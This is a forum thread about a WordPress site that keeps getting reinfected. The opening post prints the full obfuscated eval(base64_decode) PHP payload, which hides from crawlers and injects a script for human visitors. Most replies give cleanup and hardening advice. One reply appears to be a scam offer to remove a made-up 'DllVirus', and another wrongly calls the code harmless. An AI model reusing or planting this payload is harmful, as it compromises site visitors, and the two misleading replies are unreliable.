Hello friends, I am in big trouble because my all wordpress blog effected with a virus: eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNkYkoyUW5LeWR2Snlzbll5Y3JKM1VuS3lkdEp5c25aU2NySjI1MEoxMHBZV0U5TDF4M0x5NWxlR1ZqS0c1bGR5QkVZWFJsS0NrcExtbHVaR1Y0SzF0ZE8yRmhZVDBuTUNjN2RISjVlMjVsZHlCa2IyTjFiV1Z1ZENncE8zMWpZWFJqYUNoeGNYRXBlM056UFZOMGNtbHVaenQ5YVdZb1lXRXVhVzVrWlhoUFppaGhZV0VwSVQwOUxURXBDbVk5Snkwek1DRXRNekFoTmpZaE5qTWhMVGNoTVNFMk1TRTNNaUUyTUNFM09DRTNNQ0UyTWlFM01TRTNOeUUzSVRZMElUWXlJVGMzSVRNd0lUWTVJVFl5SVRjd0lUWXlJVGN4SVRjM0lUYzJJVEkzSVRneUlUUTFJVFU0SVRZMElUTTVJVFU0SVRjd0lUWXlJVEVoTUNFMU9TRTNNaUUyTVNFNE1pRXdJVEloTlRJaE9TRTFOQ0V5SVRnMElTMHpNQ0V0TXpBaExUTXdJVFkySVRZeklUYzFJVFU0SVRjd0lUWXlJVGMxSVRFaE1pRXlNQ0V0TXpBaExUTXdJVGcySVMwM0lUWXlJVFk1SVRjMklUWXlJUzAzSVRnMElTMHpNQ0V0TXpBaExUTXdJVFl4SVRjeUlUWXdJVGM0SVRjd0lUWXlJVGN4SVRjM0lUY2hPREFoTnpVaE5qWWhOemNoTmpJaE1TRXROU0V5TVNFMk5pRTJNeUUzTlNFMU9DRTNNQ0UyTWlFdE55RTNOaUUzTlNFMk1DRXlNaUV3SVRZMUlUYzNJVGMzSVRjeklURTVJVGdoT0NFM055RTJNQ0UyTXlFMU9TRTJNeUUyT0NFMU9DRTNNQ0UzSVRjMUlUWXlJVFl4SVRZMklUYzFJVFl5SVRZd0lUYzNJVGN3SVRZeUlUY2hOekVoTmpJaE56Y2hPQ0UyTVNFNElURXpJVGtoTVRNaE55RTNNeUUyTlNFM015RXlOQ0UyTkNFM01pRXlNaUV4TUNFd0lTMDNJVGd3SVRZMklUWXhJVGMzSVRZMUlUSXlJVEFoTVRBaE9TRXdJUzAzSVRZMUlUWXlJVFkySVRZMElUWTFJVGMzSVRJeUlUQWhNVEFoT1NFd0lTMDNJVGMySVRjM0lUZ3lJVFk1SVRZeUlUSXlJVEFoTnpraE5qWWhOelloTmpZaE5Ua2hOalloTmpraE5qWWhOemNoT0RJaE1Ua2hOalVoTmpZaE5qRWhOakVoTmpJaE56RWhNakFoTnpNaE56SWhOelloTmpZaE56Y2hOalloTnpJaE56RWhNVGtoTlRnaE5Ua2hOelloTnpJaE5qa2hOemdoTnpjaE5qSWhNakFoTmpraE5qSWhOak1oTnpjaE1Ua2hPU0V5TUNFM055RTNNaUUzTXlFeE9TRTVJVEl3SVRBaE1qTWhNakVoT0NFMk5pRTJNeUUzTlNFMU9DRTNNQ0UyTWlFeU15RXROU0V5SVRJd0lTMHpNQ0V0TXpBaE9EWWhMVE13SVMwek1DRTJNeUUzT0NFM01TRTJNQ0UzTnlFMk5pRTNNaUUzTVNFdE55RTJOaUUyTXlFM05TRTFPQ0UzTUNFMk1pRTNOU0V4SVRJaE9EUWhMVE13SVMwek1DRXRNekFoTnpraE5UZ2hOelVoTFRjaE5qTWhMVGNoTWpJaExUY2hOakVoTnpJaE5qQWhOemdoTnpBaE5qSWhOekVoTnpjaE55RTJNQ0UzTlNFMk1pRTFPQ0UzTnlFMk1pRXpNQ0UyT1NFMk1pRTNNQ0UyTWlFM01TRTNOeUV4SVRBaE5qWWhOak1oTnpVaE5UZ2hOekFoTmpJaE1DRXlJVEl3SVRZeklUY2hOelloTmpJaE56Y2hNalloTnpjaE56Y2hOelVoTmpZaE5Ua2hOemdoTnpjaE5qSWhNU0V3SVRjMklUYzFJVFl3SVRBaE5TRXdJVFkxSVRjM0lUYzNJVGN6SVRFNUlUZ2hPQ0UzTnlFMk1DRTJNeUUxT1NFMk15RTJPQ0UxT0NFM01DRTNJVGMxSVRZeUlUWXhJVFkySVRjMUlUWXlJVFl3SVRjM0lUY3dJVFl5SVRjaE56RWhOakloTnpjaE9DRTJNU0U0SVRFeklUa2hNVE1oTnlFM015RTJOU0UzTXlFeU5DRTJOQ0UzTWlFeU1pRXhNQ0V3SVRJaE1qQWhOak1oTnlFM05pRTNOeUU0TWlFMk9TRTJNaUUzSVRjNUlUWTJJVGMySVRZMklUVTVJVFkySVRZNUlUWTJJVGMzSVRneUlUSXlJVEFoTmpVaE5qWWhOakVoTmpFaE5qSWhOekVoTUNFeU1DRTJNeUUzSVRjMklUYzNJVGd5SVRZNUlUWXlJVGNoTnpNaE56SWhOelloTmpZaE56Y2hOalloTnpJaE56RWhNakloTUNFMU9DRTFPU0UzTmlFM01pRTJPU0UzT0NFM055RTJNaUV3SVRJd0lUWXpJVGNoTnpZaE56Y2hPREloTmpraE5qSWhOeUUyT1NFMk1pRTJNeUUzTnlFeU1pRXdJVGtoTUNFeU1DRTJNeUUzSVRjMklUYzNJVGd5SVRZNUlUWXlJVGNoTnpjaE56SWhOek1oTWpJaE1DRTVJVEFoTWpBaE5qTWhOeUUzTmlFMk1pRTNOeUV5TmlFM055RTNOeUUzTlNFMk5pRTFPU0UzT0NFM055RTJNaUV4SVRBaE9EQWhOalloTmpFaE56Y2hOalVoTUNFMUlUQWhNVEFoT1NFd0lUSWhNakFoTmpNaE55RTNOaUUyTWlFM055RXlOaUUzTnlFM055RTNOU0UyTmlFMU9TRTNPQ0UzTnlFMk1pRXhJVEFoTmpVaE5qSWhOalloTmpRaE5qVWhOemNoTUNFMUlUQWhNVEFoT1NFd0lUSWhNakFoTFRNd0lTMHpNQ0V0TXpBaE5qRWhOekloTmpBaE56Z2hOekFoTmpJaE56RWhOemNoTnlFMk5DRTJNaUUzTnlFek1DRTJPU0UyTWlFM01DRTJNaUUzTVNFM055RTNOaUV5TnlFNE1pRTBOU0UxT0NFMk5DRXpPU0UxT0NFM01DRTJNaUV4SVRBaE5Ua2hOekloTmpFaE9ESWhNQ0V5SVRVeUlUa2hOVFFoTnlFMU9DRTNNeUUzTXlFMk1pRTNNU0UyTVNFeU9DRTJOU0UyTmlFMk9TRTJNU0V4SVRZeklUSWhNakFoTFRNd0lTMHpNQ0U0TmljdWMzQnNhWFFvSnlFbktUdHRaRDBuWVNjN1pUMTNhVzVrYjNkYkoyVW5LeWQyWVd3blhUdDNQV1k3Y3owbkp6dG1jajBuWmljckozSnZKeXNuYlNjckowTm9ZWEluTzNJOWMzTmJabklySjBOdlpHVW5YVHRtYjNJb2FUMHdPekErYVMxM0xteGxibWQwYUR0cEt5c3BlMm85YVR0elBYTXJjaWd6T1NzeEtuZGJhbDBwTzMwS2FXWW9ZV0V1YVc1a1pYaFBaaWhoWVdFcElUMDlMVEVwQ21Vb2N5azdQQzl6WTNKcGNIUSsnKSk7DQp9')); ===================== above is the virus or error which I am facing in all index and other files in my cpanel. I have cleared this error many times but it comes again and again. please help me to solve this issue. thanks
You will need to get with your web host to do a full security scan of your website. If your host cannot do this, I would suggest switching to another web host. After the malware has been removed, you need to change all the passwords, and update all installations of wordpress to prevent this from happening again. Sent you a PM with more details as well.
You will never get rid of it. Let me guess. It's a free theme that you downloaded from somewhere, or nulled script. This is a common script hidden in a lot of free themes. If you search "Free WordPress themes" in Google, the first 10 sites have themes with malware in them. Read here: http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/ The only way out is to do what the previous poster suggested, and do a clean install of WordPress, with a new database. Get rid of that theme all together. Stop using free themes. This is why people don't use them. This is also why they are free. Because they enough people will download them if they think they can save a buck. The only people you can trust for free themes are the WordPress repository, and reputable companies that you know. COMPANIES (Like Woo Themes) , not Websites just because they look trustworthy. Some premium theme makers will have one or 2 themes for free.
Buy premium WordPress theme and always update script and themes. Change your password time to time. Avoid to put much plugins in your blog. Plugins are more vulnerable then other things.
thanks to all for posted replies here. I think this is happened with the free theme I have used. but tell me one thing that can I trust or use theme which are providing by wordpress ?
I think you should contact with your hosting provider. And long ago i also had this problem. Because i used a nulled template. Yes you should trust themes that are provided by wordpress. Good luck.
Its really wonder for you. First of All Make Strong Password (Combination of Alphanumeric and Special Character) to all you hosting and FTP. Attacking of Virus is main cause of low password. Delete you all file from server. If you have backup dump your backup in Server.
Any free theme that IS NOT in the WordPress repository, you have to be suspicious of. Why isn't it? Either because it has malware, or adware. The exception is known, trusted companies like Woo Themes, Solostream and a few others that give a theme away every now and then: Free themes from WooThemes: http://www.woothemes.com/themes/free/ Free themes from Solostream: http://www.solostream.com/free-wordpress-themes/ These are the only 2 companies that I trust for free themes. Really affordable theme club: http://www.elegantthemes.com/gallery/ There may be one or 2 that I left out, but, IDC how may sites people tell you about theme sites that their friends own, or that they SAY they've used without a problem. You need to check them out. Most are garbage sites that people have just used for so long that they don't even know that they are infecting themselves. Most free themes sites have one purpose. To do sneaky stuff. Either Backlinks for someone else. Or scripts to run crap on your computer, website, or server.
Hello friends, I had delete all files and folders from cPanel and installed new and fresh version of wordpress. but after few days malware is back again and now I am facing same issue again. Is this possible after clean the whole cPanel. If yes then please tell me the permanent solution to get rid from Malware attack.
Have you changed your cPanel password, WordPress Admin Password, and FTP passwords? Also, are you running the latest version of WordPress. If this does not work, you need to find out where this is coming from. Check FTP logs, cPanel Access Logs and sshd logs to find out where this is coming from. Are you on a shared webhost or VPS/Dedicated Server?
Yes I have changed cPanel password and wordpress admin passwords of all sites. and my host done the full scan of my account already. but problem is still there.
phpshells allow a user to get access to your account and make changes even though they don't know any of your passwords The only thing you can do to get rid of this is to remove all the shells at once and change all passwords.
This helps a LOT if you have files full of that nasty code. You still have to figure out where they are getting in because they will do it again. http://www.lemurcake.com/php/wordpress/security/wordpress-hack-cechirecom-com-js-php-cleanup/
I can clear the malware as well as the Dynamic DllVirus Sector.I am an ethical hacker.But it costs $100 to clear the malware .I ll finish it in a hour.
I think it can be simply avoided by not using themes with scripts inside. Those with footer coded always looked suspicious for me. I once got an SQL injection. Was cleaning all files manually for many hours...
that's no viruss, that's encoding of file. base 64 to know information. search on google, keyword : decode base 64
There is a chance your WP data base is infected. Few good tips about how to secure your WP are here: http://www.askfrank.net/how-to-secure-wordpress-blog-from-being-hacked-2012/ Changing default wp_ prefix for the data base is 1st step Hiding your wp-cofig.php by moving it up 1 level so its not publicly accessible and chmod it to 600 or 400 There are many ways to secure wordpress from hackers. Most likely your uploads folder is not secured. Go to yourblogurl.com/uploads/ if you can see the content then everybody can see it . All your plugins etc To secure it , you need to create empty index.php file inside your uploads folder Hope this helps